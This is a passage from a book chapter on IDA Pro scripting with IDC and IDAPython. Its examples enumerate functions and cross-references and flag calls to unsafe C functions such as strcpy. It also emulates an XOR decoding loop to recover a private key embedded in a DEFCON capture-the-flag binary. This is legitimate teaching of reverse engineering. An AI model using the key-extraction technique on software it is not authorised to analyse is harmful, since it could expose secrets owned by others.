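data = b"..aB..AB"
print(find_binary(data, 0, SEARCH_DOWN, "41 42"))                 # case ignored
print(find_binary(data, 0, SEARCH_DOWN | SEARCH_CASE, "41 42"))   # exact bytes only
print(find_binary(data, 2, SEARCH_DOWN, "41 42"))                 # may return addr
print(find_binary(data, 2, SEARCH_DOWN | SEARCH_NEXT, "41 42"))   # skips addr
print(find_binary(data, 6, SEARCH_NEXT, "41 42"))                 # searches upward
```

A loop that repeatedly feeds the previous result back in as addr therefore needs SEARCH_NEXT; without it, the model (like the behavior described above) keeps returning the same address.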

Disassembly Line Components

From time to time it is useful to extract the text, or portions of the text,

of individual lines in a disassembly listing. The following functions provide

access to various components of a disassembly line:

string GetDisasm(long addr)

Returns disassembly text for the given address. The returned text

includes any comments but does not include address information.

string GetMnem(long addr)

Returns the mnemonic portion of the instruction at the given address.

string GetOpnd(long addr, long opnum)

Returns the text representation of the specified operand at the specified

address. Operands are numbered from zero beginning with the leftmost

operand.

long GetOpType(long addr, long opnum)

Returns an integer representing the type for the given operand at the

given address. Refer to the IDC documentation for GetOpType for a com-

plete list of operand type codes.

long GetOperandValue(long addr, long opnum)

Returns the integer value associated with the given operand at the given

address. The nature of the returned value depends on the type of the

given operand as specified by GetOpType.

string CommentEx(long addr, long type)

Returns the text of any comment present at the given address. If type is 0,

the text of the regular comment is returned. If type is 1, the text of the

repeatable comment is returned. If no comment is present at the given

address, an empty string is returned.

IDC Scripting Examples

At this point it is probably useful to see some examples of scripts that per-

form specific tasks. For the remainder of the chapter we present some fairly

common situations in which a script can be used to answer a question about

a database.

Enumerating Functions

Many scripts operate on individual functions. Examples include generating

the call tree rooted at a specific function, generating the control flow graph

of a function, or analyzing the stack frames of every function in a database.

Listing 15-1 iterates through every function in a database and prints basic

information about each function, including the start and end addresses of

the function, the size of the function’s arguments, and the size of the func-

tion’s local variables. All output is sent to the output window.

#include <idc.idc>

static main() {
   auto addr, end, args, locals, frame, firstArg, name, ret;
   addr = 0;
   for (addr = NextFunction(addr); addr != BADADDR; addr = NextFunction(addr)) {
      name = Name(addr);
      end = GetFunctionAttr(addr, FUNCATTR_END);
      locals = GetFunctionAttr(addr, FUNCATTR_FRSIZE);
      frame = GetFrame(addr);   // retrieve a handle to the function's stack frame
      ret = GetMemberOffset(frame, " r");   // " r" is the name of the return address
      if (ret == -1) continue;
      firstArg = ret + 4;
      args = GetStrucSize(frame) - firstArg;
      Message("Function: %s, starts at %x, ends at %x\n", name, addr, end);
      Message(" Local variable area is %d bytes\n", locals);
      Message(" Arguments occupy %d bytes (%d args)\n", args, args / 4);
   }
}

Listing 15-1: Function enumeration script

This script uses some of IDC’s structure-manipulation functions to
obtain a handle to each function’s stack frame (GetFrame), determine the
size of the stack frame (GetStrucSize), and determine the offset of the saved
return address within the frame (GetMemberOffset). The script assumes 32-bit
x86 code, in which the saved return address occupies 4 bytes, so the first
argument to the function lies 4 bytes beyond the saved return address. The
size of the function’s argument area is computed as the space between the
first argument and the end of the stack frame. Since IDA can’t generate stack
frames for imported functions, the script tests whether each function’s stack
frame contains a saved return address as a simple means of identifying, and
skipping, imported functions.
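The arithmetic behind the argument-area computation can be sketched in standalone Python as follows. The argument_area helper and the sample frame layout are hypothetical and assume 32-bit x86, where both the return address and each stack argument occupy 4 bytes.

```python
def argument_area(frame_size, ret_offset, slot_size=4):
    """Return (bytes, count) of stack arguments for a 32-bit x86 frame.

    frame_size -- total size of the frame structure (what GetStrucSize reports)
    ret_offset -- offset of the saved return address (the " r" member)
    slot_size  -- size of the return address and of each argument slot
    """
    first_arg = ret_offset + slot_size
    arg_bytes = frame_size - first_arg
    return arg_bytes, arg_bytes // slot_size

# Hypothetical frame: 0x18 bytes of locals, saved ebp at offset 0x18,
# return address at offset 0x1C, followed by three 4-byte arguments.
print(argument_area(0x2C, 0x1C))
```

A frame that ends immediately after the return address yields an argument area of zero bytes, which corresponds to a function that takes no stack arguments.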

Enumerating Instructions

Within a given function, you may want to enumerate every instruction. List-

ing 15-2 counts the number of instructions contained in the function identi-

fied by the current cursor position:

#include <idc.idc>

static main() {
   auto func, end, count, inst;
   func = GetFunctionAttr(ScreenEA(), FUNCATTR_START);   // (1)
   if (func != -1) {
      end = GetFunctionAttr(func, FUNCATTR_END);   // (2)
      count = 0;
      inst = func;
      while (inst != BADADDR && inst < end) {   // also stop if no more code is found
         count++;
         inst = FindCode(inst, SEARCH_DOWN | SEARCH_NEXT);   // (3)
      }
      Warning("%s contains %d instructions\n", Name(func), count);
   }
   else {
      Warning("No function found at location %x", ScreenEA());
   }
}

Listing 15-2: Instruction enumeration script

The function begins (1) by using GetFunctionAttr to determine the start
address of the function containing the cursor address (ScreenEA()). If the
beginning of a function is found, the next step (2) is to determine the end
address for the function, once again using the GetFunctionAttr function.
Once the function has been bounded, a loop is executed to step through
successive instructions in the function by using the search functionality of
the FindCode function (3). In this example, the Warning function is used to
display results, since only a single line of output will be generated by the
function and output displayed in a Warning dialog is much more obvious than
output generated in the message window. Note that this example assumes
that all of the instructions within the given function are contiguous. An
alternative approach might replace the use of FindCode with logic to iterate
over all of the code cross-references for each instruction within the function.
Properly written, this second approach would handle noncontiguous, also
known as “chunked,” functions.
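To make the flow-driven alternative more concrete, here is a minimal standalone Python sketch of a worklist traversal over a toy control-flow table. It is not the IDC implementation; the count_reachable helper and the toy_flow data are hypothetical. Inside IDA, the successor lists would presumably be built from each instruction's code cross-references, leaving out call-type references so that the traversal stays within one function.

```python
def count_reachable(entry, successors):
    """Count instructions reachable from entry by following code flow.

    successors maps an instruction address to the addresses that control
    may reach next (fall-through and jump targets, but not call targets).
    """
    seen = set()
    worklist = [entry]
    while worklist:
        addr = worklist.pop()
        if addr in seen:
            continue
        seen.add(addr)
        worklist.extend(successors.get(addr, ()))
    return len(seen)

# Toy function whose body jumps into a detached chunk at 0x2000 and back.
toy_flow = {
    0x1000: [0x1002],
    0x1002: [0x1004],
    0x1004: [0x2000],   # jmp into a separate chunk
    0x2000: [0x2003],
    0x2003: [0x1009],   # jmp back to the main body
    0x1009: [],         # ret
    0x1006: [0x1009],   # bytes inside the address range that are never reached
}
print(count_reachable(0x1000, toy_flow))
```

Because the traversal follows flow rather than addresses, the chunk at 0x2000 is counted even though it lies outside the contiguous range, while the unreached entry at 0x1006 is not.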

Enumerating Cross-References

Iterating through cross-references can be confusing because of the number
of functions available for accessing cross-reference data and the fact that
code cross-references are bidirectional. In order to get the data you want,
you need to make sure you are accessing the proper type of cross-reference
for your situation. In our first cross-reference example, shown in Listing 15-3,
we derive the list of all function calls made within a function by iterating
through each instruction in the function to determine if the instruction calls
another function. One method of doing this might be to parse the results of
GetMnem to look for call instructions. This approach has two drawbacks. First,
it would not be very portable, because the instruction used to call a function
varies among CPU types. Second, additional parsing would be required to
determine exactly which function was being called. Cross-references avoid both
of these difficulties because they are CPU-independent and directly inform us
about the target of the cross-reference.

#include <idc.idc>

static main() {
   auto func, end, target, inst, name, flags, xref;
   flags = SEARCH_DOWN | SEARCH_NEXT;
   func = GetFunctionAttr(ScreenEA(), FUNCATTR_START);
   if (func != -1) {
      name = Name(func);
      end = GetFunctionAttr(func, FUNCATTR_END);
      // the BADADDR test stops the loop if FindCode finds no further code
      for (inst = func; inst != BADADDR && inst < end; inst = FindCode(inst, flags)) {
         for (target = Rfirst(inst); target != BADADDR; target = Rnext(inst, target)) {
            xref = XrefType();
            if (xref == fl_CN || xref == fl_CF) {
               Message("%s calls %s from 0x%x\n", name, Name(target), inst);
            }
         }
      }
   }
   else {
      Warning("No function found at location %x", ScreenEA());
   }
}

Listing 15-3: Enumerating function calls

In this example, we must iterate through each instruction in the func-

tion. For each instruction, we must then iterate through each cross-reference

from the instruction. We are interested only in cross-references that call other

functions, so we must test the return value of XrefType looking for fl_CN or

fl_CF-type cross-references. Here again, this particular solution handles only

functions whose instructions happen to be contiguous. Given that the script

is already iterating over the cross-references from each instruction, it would

not take many changes to produce a flow-driven analysis instead of the

address-driven analysis seen here.

Another use for cross-references is to determine every location that refer-

ences a particular location. For example, if we wanted to create a low-budget

security analyzer, we might be interested in highlighting all calls to functions

such as strcpy and sprintf.

DANGEROUS FUNCTIONS

The C functions strcpy and sprintf are generally acknowledged as dangerous

to use because they allow for unbounded copying into destination buffers. While

each may be safely used by programmers who conduct proper checks on the size

of source and destination buffers, such checks are all too often forgotten by program-

mers unaware of the dangers of these functions. The strcpy function, for example, is

declared as follows:

char *strcpy(char *dest, const char *source);

The strcpy function’s defined behavior is to copy all characters up to and
including the first null termination character encountered in the source buffer
to the given destination buffer (dest). The fundamental problem is that C
provides no way to determine, at runtime, the size of an array given only a
pointer to it. In this instance, strcpy has no means to determine whether the
capacity of the destination buffer is sufficient to hold all of the data to be
copied from source. Such unchecked copy operations are a major cause of buffer
overflow vulnerabilities.
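The effect of an unchecked copy can be simulated in standalone Python by modeling memory as a flat bytearray. This is only a sketch of the behavior described above, not the C library's implementation; the unchecked_strcpy helper and the memory layout are hypothetical.

```python
def unchecked_strcpy(memory, dest, source):
    """Copy source up to its first NUL, plus the NUL, into memory at dest.

    Like strcpy, this never asks how large the destination buffer is.
    """
    data = source.split(b"\x00", 1)[0] + b"\x00"
    memory[dest:dest + len(data)] = data
    return dest

# An 8-byte destination buffer followed immediately by a 4-byte neighbor.
memory = bytearray(b"\x00" * 8 + b"SAFE")
unchecked_strcpy(memory, 0, b"AAAAAAAAAAA")   # 11 bytes + NUL = 12 bytes
print(bytes(memory[8:12]))                    # the neighbor after the copy
```

The copy runs past the end of the 8-byte buffer and replaces the neighboring value, which is the essence of a buffer overflow.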

In the example shown in Listing 15-4, we work in reverse to iterate across

all of the cross-references to (as opposed to from in the preceding example) a

particular symbol:

#include <idc.idc>

static list_callers(bad_func) {
   auto func, addr, xref, source;
   func = LocByName(bad_func);   // (1)
   if (func == BADADDR) {
      Warning("Sorry, %s not found in database", bad_func);
   }
   else {
      for (addr = RfirstB(func); addr != BADADDR; addr = RnextB(func, addr)) {   // (2)
         xref = XrefType();   // (3)
         if (xref == fl_CN || xref == fl_CF) {   // (4)
            source = GetFunctionName(addr);   // (5)
            Message("%s is called from 0x%x in %s\n", bad_func, addr, source);   // (6)
         }
      }
   }
}

static main() {
   list_callers("_strcpy");
   list_callers("_sprintf");
}

Listing 15-4: Enumerating a function’s callers

In this example, the LocByName function (1) is used to find the address of a
given (by name) bad function. If the function’s address is found, a loop (2) is
executed in order to process all cross-references to the bad function. For each
cross-reference, if the cross-reference type (3) is determined to be a call-type
cross-reference (4), the calling function’s name is determined (5) and is
displayed to the user (6).

It is important to note that some modifications may be required to per-

form a proper lookup of the name of an imported function. In ELF executa-

bles in particular, which combine a procedure linkage table (PLT) with a

global offset table (GOT) to handle the details of linking to shared libraries,

the names that IDA assigns to imported functions may be less than clear. For

example, a PLT entry may appear to be named _memcpy, when in fact it is

named .memcpy and IDA has replaced the dot with an underscore because

IDA considers dots invalid characters within names. Further complicating

matters is the fact that IDA may actually create a symbol named memcpy that

resides in a section that IDA names extern. When attempting to enumerate

cross-references to memcpy, we are interested in the PLT version of the symbol

because this is the version that is called from other functions in the program

and thus the version to which all cross-references would refer.
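One way to cope with this naming ambiguity is to try several spellings of a name until one resolves. The standalone Python sketch below illustrates the idea with a toy symbol table standing in for the database. The helper names are hypothetical, and a real script would call LocByName and compare against BADADDR rather than None.

```python
def import_name_candidates(symbol):
    """Hypothetical helper: names under which an import might be listed."""
    base = symbol.lstrip("_.")
    # PLT stub as displayed, PLT stub as stored, then the extern symbol.
    return ["_" + base, "." + base, base]

def first_known(candidates, lookup):
    """Return the first (name, address) pair that lookup can resolve."""
    for name in candidates:
        addr = lookup(name)
        if addr is not None:
            return name, addr
    return None

# Stand-in for LocByName: a toy symbol table instead of a real database.
toy_names = {".memcpy": 0x8048500, "memcpy": 0x804C010}
print(first_known(import_name_candidates("memcpy"), toy_names.get))
```

The candidates are ordered so that the PLT spellings are tried before the extern symbol, since the PLT entry is the one that other functions actually call.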

Enumerating Exported Functions

In Chapter 13 we discussed the use of idsutils to generate .ids files that

describe the contents of shared libraries. Recall that the first step in generat-

ing a .ids file involves generating a .idt file, which is a text file containing

descriptions of each exported function contained in the library. IDC con-

tains functions for iterating through the functions that are exported by a

shared library. The script shown in Listing 15-5 can be run to generate an

.idt file after opening a shared library with IDA:

#include <idc.idc>

static main() {
   auto entryPoints, i, ord, addr, name, purged, file, fd;
   file = AskFile(1, "*.idt", "Select IDT save file");
   fd = fopen(file, "w");
   entryPoints = GetEntryPointQty();
   fprintf(fd, "ALIGNMENT 4\n");
   fprintf(fd, "0 Name=%s\n", GetInputFile());
   for (i = 0; i < entryPoints; i++) {
      ord = GetEntryOrdinal(i);
      if (ord == 0) continue;
      addr = GetEntryPoint(ord);
      if (ord == addr) {
         continue;   //entry point has no ordinal
      }
      name = Name(addr);
      fprintf(fd, "%d Name=%s", ord, name);
      purged = GetFunctionAttr(addr, FUNCATTR_ARGSIZE);
      if (purged > 0) {
         fprintf(fd, " Pascal=%d", purged);
      }
      fprintf(fd, "\n");
   }
}

Listing 15-5: A script to generate .idt files

The output of the script is saved to a file chosen by the user. New func-

tions introduced in this script include GetEntryPointQty, which returns the

number of symbols exported by the library; GetEntryOrdinal, which returns

an ordinal number (an index into the library’s export table); GetEntryPoint,

which returns the address associated with an exported function that has been

identified by ordinal number; and GetInputFile, which returns the name of

the file that was loaded into IDA.
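The text that the script emits can be seen in isolation with the following standalone Python sketch, which formats the same three kinds of lines from a list of tuples. The format_idt helper and the sample export table are made up for illustration; only the line layout is taken from Listing 15-5.

```python
def format_idt(library, exports, alignment=4):
    """Build .idt text from (ordinal, name, purged_bytes) tuples."""
    lines = ["ALIGNMENT %d" % alignment, "0 Name=%s" % library]
    for ordinal, name, purged in exports:
        line = "%d Name=%s" % (ordinal, name)
        if purged > 0:
            # Bytes the function removes from the stack when it returns.
            line += " Pascal=%d" % purged
        lines.append(line)
    return "\n".join(lines) + "\n"

# Made-up export table for illustration only.
sample = [(1, "InitWidget", 8), (2, "FreeWidget", 0)]
print(format_idt("widget.dll", sample), end="")
```

Separating the formatting from the database queries in this way also makes the output easy to check without opening a library in IDA.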

Finding and Labeling Function Arguments

Versions of GCC later than 3.4 use mov statements rather than push statements

in x86 binaries to place function arguments into the stack before calling a

function. Occasionally this causes some analysis problems for IDA (newer

versions of IDA handle this situation better), because the analysis engine

relies on finding push statements to pinpoint locations at which arguments

are pushed for a function call. The following listing shows an IDA disassem-

bly when parameters are pushed onto the stack:

.text:08048894                 push    0               ; protocol
.text:08048896                 push    1               ; type
.text:08048898                 push    2               ; domain
.text:0804889A                 call    _socket

Note the comments that IDA has placed in the right margin. Such com-

menting is possible only when IDA recognizes that parameters are being

pushed and when IDA knows the signature of the function being called.

When mov statements are used to place parameters onto the stack, the

resulting disassembly is somewhat less informative, as shown here:

.text:080487AD                 mov     [esp+8], 0
.text:080487B5                 mov     [esp+4], 1
.text:080487BD                 mov     [esp], 2
.text:080487C4                 call    _socket

In this case, IDA has failed to recognize that the three mov statements pre-

ceding the call are being used to set up the parameters for the function call.

As a result, we get less assistance from IDA in the form of automatic comments

in the disassembly.

Here we have a situation where a script might be able to restore some of

the information that we are accustomed to seeing in our disassemblies. List-

ing 15-6 is a first effort at automatically recognizing instructions that are set-

ting up parameters for function calls:

#include <idc.idc>

static main() {
   auto addr, op, end, idx;
   auto func_flags, type, val, search;
   search = SEARCH_DOWN | SEARCH_NEXT;
   addr = GetFunctionAttr(ScreenEA(), FUNCATTR_START);
   func_flags = GetFunctionFlags(addr);
   if (func_flags & FUNC_FRAME) {   //Is this an ebp-based frame?
      end = GetFunctionAttr(addr, FUNCATTR_END);
      for (; addr < end && addr != BADADDR; addr = FindCode(addr, search)) {
         type = GetOpType(addr, 0);
         if (type == 3) {   //Is this a register indirect operand?
            if (GetOperandValue(addr, 0) == 4) {   //Is the register esp?
               MakeComm(addr, "arg_0");   //[esp] equates to arg_0
            }
         }
         else if (type == 4) {   //Is this a register + displacement operand?
            idx = strstr(GetOpnd(addr, 0), "[esp");   //Is the register esp?
            if (idx != -1) {
               val = GetOperandValue(addr, 0);   //get the displacement
               MakeComm(addr, form("arg_%d", val));   //add a comment
            }
         }
      }
   }
}

Listing 15-6: Automating parameter recognition

The script works only on EBP-based frames and relies on the fact that

when parameters are moved into the stack prior to a function call, GCC

generates memory references relative to esp. The script iterates through all

instructions in a function; for each instruction that writes to a memory loca-

tion using esp as a base register, the script determines the depth within the

stack and adds a comment indicating which parameter is being moved. The

GetFunctionFlags function offers access to various flags associated with a func-

tion, such as whether the function uses an EBP-based stack frame. Running

the script in Listing 15-6 yields the annotated disassembly shown here:

.text:080487AD                 mov     [esp+8], 0      ; arg_8
.text:080487B5                 mov     [esp+4], 1      ; arg_4
.text:080487BD                 mov     [esp], 2        ; arg_0
.text:080487C4                 call    _socket

The comments aren’t particularly informative. However, we can now tell

at a glance that the three mov statements are used to place parameters onto

the stack, which is a step in the right direction. By extending the script a bit

further and exploring some more of IDC’s capabilities, we can come up with

a script that provides almost as much information as IDA does when it prop-

erly recognizes parameters. The output of the final product is shown here:

.text:080487AD                 mov     [esp+8], 0      ; int protocol
.text:080487B5                 mov     [esp+4], 1      ; int type
.text:080487BD                 mov     [esp], 2        ; int domain
.text:080487C4                 call    _socket

The extended version of the script in Listing 15-6, which is capable of
incorporating data from function signatures into comments, is available on
this book’s website.[8]

8. See http://www.idabook.com/ch15_examples.
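The core idea of mapping a stack slot to a declared parameter can be sketched in standalone Python as follows. This is not the extended script from the book's website; the label_stack_argument helper is hypothetical, the parameter list is supplied by hand rather than read from IDA's type information, and the operand text is assumed to have the simple form [esp] or [esp+N] with N in hexadecimal.

```python
import re

def label_stack_argument(operand, params, slot_size=4):
    """Map an operand such as "[esp+8]" to a declared parameter.

    params lists the callee's parameters in declaration order. Returns
    None when the operand is not esp-relative, or a generic arg_N label
    when the slot lies beyond the known parameters.
    """
    match = re.match(r"\[esp(?:\+([0-9A-Fa-f]+)h?)?\]$", operand)
    if match is None:
        return None
    offset = int(match.group(1), 16) if match.group(1) else 0
    index = offset // slot_size
    if offset % slot_size == 0 and index < len(params):
        return params[index]
    return "arg_%d" % offset

socket_params = ["int domain", "int type", "int protocol"]
for text in ("[esp+8]", "[esp+4]", "[esp]"):
    print(text, "->", label_stack_argument(text, socket_params))
```

Because arguments are stored in declaration order starting at [esp], dividing the displacement by the slot size gives the parameter's position in the prototype.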

Emulating Assembly Language Behavior

There are a number of reasons why you might need to write a script that

emulates the behavior of a program you are analyzing. For example, the pro-

gram you are studying may be self-modifying, as many malware programs are,

or the program may contain some encoded data that gets decoded when it

is needed at runtime. Without running the program and pulling the modi-

fied data out of the running process’s memory, how can you understand

the behavior of the program? The answer may lie with an IDC script. If the

decoding process is not terribly complex, you may be able to quickly write

an IDC script that performs the same actions that are performed by the

program when it runs. Using a script to decode data in this way eliminates

the need to run a program when you don’t know what the program does or

you don’t have access to a platform on which you can run the program. An

example of the latter case might occur if you were examining a MIPS binary

with your Windows version of IDA. Without any MIPS hardware, you would not

be able to execute the MIPS binary and observe any data decoding it might

perform. You could, however, write an IDC script to mimic the behavior of

the binary and make the required changes within the IDA database, all with

no need for a MIPS execution environment.

The following x86 code was extracted from a DEFCON[9] Capture the
Flag binary.[10]

.text:08049EDE                 mov     [ebp+var_4], 0
.text:08049EE5
.text:08049EE5 loc_8049EE5:
.text:08049EE5                 cmp     [ebp+var_4], 3C1h
.text:08049EEC                 ja      short locret_8049F0D
.text:08049EEE                 mov     edx, [ebp+var_4]
.text:08049EF1                 add     edx, 804B880h
.text:08049EF7                 mov     eax, [ebp+var_4]
.text:08049EFA                 add     eax, 804B880h
.text:08049EFF                 mov     al, [eax]
.text:08049F01                 xor     eax, 4Bh
.text:08049F04                 mov     [edx], al
.text:08049F06                 lea     eax, [ebp+var_4]
.text:08049F09                 inc     dword ptr [eax]
.text:08049F0B                 jmp     short loc_8049EE5

This code decodes a private key that has been embedded within the pro-

gram binary. Using the IDC script shown in Listing 15-7, we can extract the

private key without running the program:

auto var_4, edx, eax, al;
var_4 = 0;
while (var_4 <= 0x3C1) {
   edx = var_4;
   edx = edx + 0x804B880;
   eax = var_4;
   eax = eax + 0x804B880;
   al = Byte(eax);
   al = al ^ 0x4B;
   PatchByte(edx, al);
   var_4++;
}

Listing 15-7: Emulating assembly language with IDC

9. See http://www.defcon.org/.

10. Courtesy of Kenshoto, the organizers of CTF at DEFCON 15. Capture the Flag is an annual
hacking competition held at DEFCON.

Listing 15-7 is a fairly literal translation of the preceding assembly lan-

guage sequence generated according to the following rather mechanical

rules.

1. For each stack variable and register used in the assembly code, declare

an IDC variable.

2. For each assembly language statement, write an IDC statement that mim-

ics its behavior.

3. Reading and writing stack variables is emulated by reading and writing

the corresponding variable declared in your IDC script.

4. Reading from a nonstack location is accomplished using the Byte, Word,

or Dword function, depending on the amount of data being read (1, 2, or

4 bytes).

5. Writing to a nonstack location is accomplished using the PatchByte, Patch-

Word, or PatchDword function, depending on the amount of data being

written.

6. In general, if the code appears to contain a loop for which the termina-

tion condition is not immediately obvious, it is easiest to begin with an

infinite loop such as while (1) {} and then insert a break statement when

you encounter statements that cause the loop to terminate.

7. When the assembly code calls functions, things get complicated. In

order to properly simulate the behavior of the assembly code, you must

find a way to mimic the behavior of the function that has been called,

including providing a return value that makes sense within the context

of the code being simulated. This fact alone may preclude the use of IDC

as a tool for emulating the behavior of an assembly language sequence.
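The rules above can also be applied outside IDA. The following standalone Python sketch translates the same assembly sequence instruction by instruction, using a dictionary as a stand-in for the database and following rule 6 by starting with an infinite loop. The Byte and PatchByte functions here are toy imitations of their IDC namesakes, and the sample plaintext is made up.

```python
BASE = 0x804B880
memory = {}                      # stand-in for the database: address -> byte

def Byte(addr):                  # toy imitation of IDC's Byte
    return memory.get(addr, 0)

def PatchByte(addr, value):      # toy imitation of IDC's PatchByte
    memory[addr] = value & 0xFF

def emulate():
    var_4 = 0                            # mov [ebp+var_4], 0
    while True:                          # loc_8049EE5:
        if var_4 > 0x3C1:                # cmp [ebp+var_4], 3C1h / ja ...
            break
        edx = var_4 + BASE               # mov edx, [ebp+var_4] / add edx, ...
        eax = var_4 + BASE               # mov eax, [ebp+var_4] / add eax, ...
        eax = (eax & ~0xFF) | Byte(eax)  # mov al, [eax]
        eax ^= 0x4B                      # xor eax, 4Bh
        PatchByte(edx, eax)              # mov [edx], al
        var_4 += 1                       # lea eax, [ebp+var_4] / inc dword ptr [eax]
    return var_4

# Seed the toy memory with made-up data encoded the same way, then decode it.
plain = b"sample key"
for i, b in enumerate(bytearray(plain)):
    memory[BASE + i] = b ^ 0x4B
emulate()
print(bytes(bytearray(memory[BASE + i] for i in range(len(plain)))))
```

Note that the unsigned ja test means the loop body runs for every index from 0 through 0x3C1 inclusive, for a total of 0x3C2 bytes.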

The important thing to understand when developing scripts such as the

previous one is that it is not absolutely necessary to fully understand how

the code you are emulating behaves on a global scale. It is often sufficient

to understand only one or two instructions at a time and generate correct

IDC translations for those instructions. If each instruction has been correctly

translated into IDC, then the script as a whole should properly mimic the

complete functionality of the original assembly code. We can delay further

study of the assembly language algorithm until after the IDC script has

been completed, at which point we can use the IDC script to enhance our

understanding of the underlying assembly. Once we spend some time con-

sidering how our example algorithm works, we might shorten the preceding

IDC script to the following:

auto var_4, addr;
for (var_4 = 0; var_4 <= 0x3C1; var_4++) {
   addr = 0x804B880 + var_4;
   PatchByte(addr, Byte(addr) ^ 0x4B);
}

Alternatively, if we did not wish to modify the database in any way, we
could replace the call to PatchByte with a call to Message if we were dealing
with ASCII data, or write the data to a file if we were dealing with binary
data.
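A non-modifying variant might look like the following standalone Python sketch, which decodes into a separate buffer and then chooses between printing and writing a file. The helper names, the sample data, and the decoded.bin file name are hypothetical; in IDA the encoded bytes would first be read from the database.

```python
def xor_decode(encoded, key=0x4B):
    """Return a decoded copy of encoded without modifying the input."""
    return bytes(bytearray(b ^ key for b in bytearray(encoded)))

def is_printable_ascii(data):
    """True if every byte is printable ASCII, a tab, or a line ending."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in bytearray(data))

# Made-up sample, encoded with the same single-byte XOR key.
encoded = bytes(bytearray(b ^ 0x4B for b in bytearray(b"made-up sample text")))
decoded = xor_decode(encoded)
if is_printable_ascii(decoded):
    print(decoded.decode("ascii"))           # analogous to calling Message
else:
    with open("decoded.bin", "wb") as out:   # hypothetical output file name
        out.write(decoded)
```

Because XOR with a fixed key is its own inverse, the same function both encodes and decodes, and the original data is left untouched.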

IDAPython

IDAPython is a plug-in developed by Gergely Erdelyi that integrates a Python
interpreter into IDA. Combined with supplied Python bindings, this plug-in
allows you to write Python scripts with full access to all of the capabilities of
the IDC scripting language. One clear advantage gained with IDAPython is
access to Python’s native data-handling capabilities as well as the full range
of Python modules. In addition, IDAPython exposes a significant portion of
IDA’s SDK functionality, allowing for far more powerful scripting than is
possible using IDC. IDAPython has developed quite a following in the IDA
community. Ilfak’s blog[11] contains numerous interesting examples of problem
solving with Python scripts, while questions, answers, and many other useful
IDAPython scripts are frequently posted in the forums at OpenRCE.org.[12] In
addition, third-party tools such as BinNavi[13] from Zynamics rely on IDA and
IDAPython in order to perform various subtasks required by the tools.

Since IDA 5.4, Hex-Rays has been including IDAPython as a standard
plug-in. Source code for the plug-in is available for download on the
IDAPython project page,[14] and API documentation is available on the Hex-Rays
website.[15] IDA enables the plug-in only when Python is found to be installed
on the computer on which you are running IDA. The Windows version of
IDA ships with and installs a compatible version of Python,[16] while the Linux
and OS X versions of IDA leave proper installation of Python up to you. On
Linux, the current version of IDA (6.1) looks for Python 2.6. IDAPython is
compatible with Python 2.7, and IDA will work just fine if you create symlinks
from the required Python 2.6 libraries to your existing Python 2.7 libraries. If
you have Python 2.7, a command similar to the following will create the
symlink that will make IDA happy:

# ln -s /usr/lib/libpython2.7.so.1.0 /usr/lib/libpython2.6.so.1

11. See http://www.hexblog.com.

12. See http://www.openrce.org/articles/.

13. See http://www.zynamics.com/binnavi.html.

14. See http://code.google.com/p/idapython/.

15. See http://www.hex-rays.com/idapro/idapython_docs/index.html.

16. See http://www.python.org/.

OS X users may find that the version of Python that ships with OS X is
older than that required by IDA. If this is the case, a suitable Python installer
should be downloaded from www.python.org.[17]

Using IDAPython

IDAPython bridges Python code into IDA by making available three

Python modules, each serving a specific purpose. Access to the core IDA

API (as exposed via the SDK) is made available with the idaapi module. All

of the functions present in IDC are made available in IDAPython’s idc mod-

ule. The third module that ships with IDAPython is idautils, which provides

a number of utility functions, many of which yield Python lists of various

database-related objects such as functions or cross-references. Modules idc

and idautils are automatically imported for all IDAPython scripts. If you

need idaapi, on the other hand, you must import it yourself.

When using IDAPython, keep in mind that the plug-in embeds a single

instance of the Python interpreter into IDA. This interpreter is not destroyed

until you close IDA. As a result, you can view all of your scripts and state-

ments as if they are running within a single Python shell session. For exam-

ple, once you have imported the idaapi module for the first time in your IDA

session, you need never import it again until you restart IDA. Similarly, ini-

tialized variables and function definitions retain their values until they are

redefined or until you quit IDA.
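One practical consequence is that a script cannot assume it starts from a clean slate. The standalone Python sketch below imitates the situation with an ordinary dictionary standing in for the interpreter's retained global state; the run_script helper and the run_count name are hypothetical.

```python
def run_script(namespace):
    """Simulate one execution of a script inside a shared namespace."""
    # Initialize only on the first run; later runs see the retained value.
    if "run_count" not in namespace:
        namespace["run_count"] = 0
    namespace["run_count"] += 1
    return namespace["run_count"]

session = {}                 # stands in for the interpreter's global state
print(run_script(session))   # first run in this session
print(run_script(session))   # second run sees the value left by the first
```

A script that depends on fresh values should therefore assign them explicitly each time it runs rather than rely on names being undefined.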

There are a number of strategies for learning IDA’s Python API. If you
already have some experience using IDC or programming with the IDA SDK,
then you should feel right at home with the idaapi and idc modules. A quick
review of the additional features in the idautils module should be all you
really need to start making full use of IDAPython. If you have no prior
experience with IDC or the SDK, then you might dive into the Hex-Rays
documentation for the Python API to develop a feel for the capabilities it offers.
Remember that the idc module basically mirrors the IDC API and that you
may find the list of IDC functions in IDA’s built-in help to be quite useful.
Similarly, the descriptions of IDC functions presented earlier in this chapter
are equally applicable to the corresponding functions in the idc module.

17. See http://www.python.org/download/mac/.

IDAPython Scripting Examples

To compare and contrast IDC and IDAPython, the following sections present
the same example cases seen previously in the discussion of IDC. Wherever
possible we endeavor to make maximum use of Python-specific features to
demonstrate some of the efficiencies that can be gained by scripting in Python.

Enumerating Functions

One of the strengths of IDAPython is the way that it uses Python’s powerful

datatypes to simplify access to collections of database objects. In Listing 15-8,

we reimplement the function enumeration script of Listing 15-1 in Python.

Recall that the purpose of this script is to iterate over every function in a

database and print basic information about each function, including the

start and end addresses of the function, the size of the function’s arguments,

and the size of the function’s local variable space. All output is sent to the

output window.

funcs = Functions()   # (1)
for f in funcs:       # (2)
    name = Name(f)
    end = GetFunctionAttr(f, FUNCATTR_END)
    locals = GetFunctionAttr(f, FUNCATTR_FRSIZE)
    frame = GetFrame(f)   # retrieve a handle to the function's stack frame
    if frame is None: continue
    ret = GetMemberOffset(frame, " r")   # " r" is the name of the return address
    if ret == -1: continue
    firstArg = ret + 4
    args = GetStrucSize(frame) - firstArg
    Message("Function: %s, starts at %x, ends at %x\n" % (name, f, end))
    Message(" Local variable area is %d bytes\n" % locals)
    Message(" Arguments occupy %d bytes (%d args)\n" % (args, args / 4))

Listing 15-8: Function enumeration using Python

For this particular script, the use of Python gains us little in the way of
efficiency other than the use of the Functions list generator (1), which
facilitates the for loop at (2).

Enumerating Instructions

Listing 15-9 demonstrates how the instruction-counting script of Listing 15-2

might be written in Python, taking advantage of the list generators available

in the idautils module.

from idaapi import *

func = get_func(here())   # (1) here() is synonymous with ScreenEA()
if func is not None:
    fname = Name(func.startEA)
    count = 0
